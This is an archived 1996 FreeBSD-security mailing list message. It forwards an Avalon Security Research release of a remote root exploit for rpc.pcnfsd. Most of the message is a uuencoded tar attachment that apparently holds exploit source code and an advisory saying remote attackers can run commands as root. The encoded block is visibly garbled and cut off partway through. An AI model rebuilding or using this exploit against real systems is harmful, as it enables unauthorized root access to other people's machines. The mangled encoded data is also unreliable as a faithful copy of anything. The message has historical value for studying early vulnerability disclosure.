From owner-freebsd-security Thu Feb 22 17:53:52 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id RAA08598 for security-outgoing; Thu, 22 Feb 1996 17:53:52 -0800 (PST) Received: from nervosa.com (root@nervosa.com [192.187.228.86]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id RAA08529 for ; Thu, 22 Feb 1996 17:53:14 -0800 (PST) Received: from nervosa.com (coredump@onyx.nervosa.com [10.0.0.1]) by nervosa.com (8.7.3/nervosa.com.2) with SMTP id RAA12380 for ; Thu, 22 Feb 1996 17:53:05 -0800 (PST) Date: Thu, 22 Feb 1996 17:53:05 -0800 (PST) From: invalid opcode To: freebsd-security@freebsd.org Subject: BoS: ASR --- Remote Pcnfsd Exploit (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org Precedence: bulk As below. == Chris Layne ============================================================== == coredump@nervosa.com ================= http://www.nervosa.com/~coredump == ---------- Forwarded message ---------- Date: Thu, 22 Feb 1996 10:39:44 -0700 From: mcpheea@cadvision.com To: best-of-security@suburbia.net Subject: BoS: ASR --- Remote Pcnfsd Exploit Avalon Security Research Release 1996.1 (pcnfsd) The following uuencoded attachment is a copy of the remote exploit for rpc.pcnfsd. The semantics to the bug as well as a suggested fix were released via the list on 02/13/96. If you for some reason missed this this mail, it has been packaged with this release. If you are not on the ASR mailing list you may subscribe by sending mail to mcpheea@cadvision.com with word 'SUB' or 'sub' in the body. Note: When subscribing the word sub should be the only non-whitespace on the line. Avalon Security Research All replies should be directed to mcpheea@cadvision.com begin 644 slugger2.tar M2!297-E87)C:`H@("`@("`@("`@("`@("`@("`@("`@ M("`@("`@(%)E;&5A`H*("`@069F96-T.B!296UO=&4@871T86-K97)S(&UA M>2!E>&5C=71E(&%N(&%R8FET2!C;VUM86YD(&%S(')O;W0@;VX@"B`@ M("`@("`@("`@=&AE('1A2!C86QL('1O(&ET(&EN M('!R7W-T87)T("AP8VYF2!U;F1E"X@($%34B!W96QC;VUE7-T96US+@H*("`@ M4V]U2!B92!D:7)E8W1E9"!T;R!M8W!H965A M0&-A9'9I2X@(`I.;W1E.B`@=VAE;B!S=6)S8W)I8FEN9R!T:&4@=V]R9"!S=6(@ M``````````````````` M```````````````````````````````````````````````````````````` M````````````````````````````````````````````("`@-S4U(``@("`@ M(#`@`"`@("`@,2``("`@("`@(#,P,38@(#8Q,3(P-#4S-C,@("`U-#4W`"`` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M`````````````````````````````````````````````````````"\J(&UY M<&-N9G-D+G@*("H@0GD@2!N;R!I9&5A('=H>2!T:&ES(&ES(&AEPH@("!04U]215-?3TL],"P*("`@ M4%-?4D537T%,4D5!1%D],2P@("`@("`@("`@+RH@86QR96%D>2!Q=65U960@ M*B\@("`*("`@4%-?4D537TY53$P],BP*("`@4%-?4D537TY/7T9)3$4],RP* M("`@4%-?4D537T9!24P]-`I].PH@"F-O;G-T(%5315),14X@/2`S,CL*8V]N M7!E M9&5F('-T7-E;&8\55-%4DQ%3CX["G1Y<&5D968@7-E;&8@86%?:61E;G0["B`@ M(&=E;G-TPH@ M("!E;G5M(&%R'!L;VET('1O(&9A:6PN"B`J($EF(')P8RYP M8VYF2!I7,@9F%I;"!A;F0@<')I;G0@=&AE(&5R7,@=&EM97,@;W5T(&]N="!I="=S('!R7W-T87)T(&-A M;&P@8F5C875S92!R<&,N<&-N9G-D"B`J("`@(&1I97,@8F5F;W)E(&ET(&=E M=',@82!C:&%N8V4@=&\@"!F;W(@=&AI2!S;6%L;"!F;W(@ M=&AE('!R7W-T87)T(&-A;&PN"B`J"B`J("HJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ M*BHJ*BH*("H*("H@5&AI2!R97-P;VYS:6)I;&ET>2!F;W(@=&AE('5S90H@*B`@("!O M7,O=&EM92YH/@HC:6YC;'5D92`\2!R M<&-G96X@*B\*(`H@"FEN="!M86EN*&%R9V,L(&%R9W8I"FEN="!APH@("`*("`@8VAAR`@<')I;G1F*")C;VUM86YD(&UU2`] M($%&7TE.150["B`@(&1A6AOT$Z/21( M3TU%?2XN)$$N+B1[07UB:6XD>T%]'!L;VET+"`@:70@&EN9R!T:&ES+B`@*B\*"B`@("\J('-I M;7!L92!M:6YDR`@<')I;G1F*")%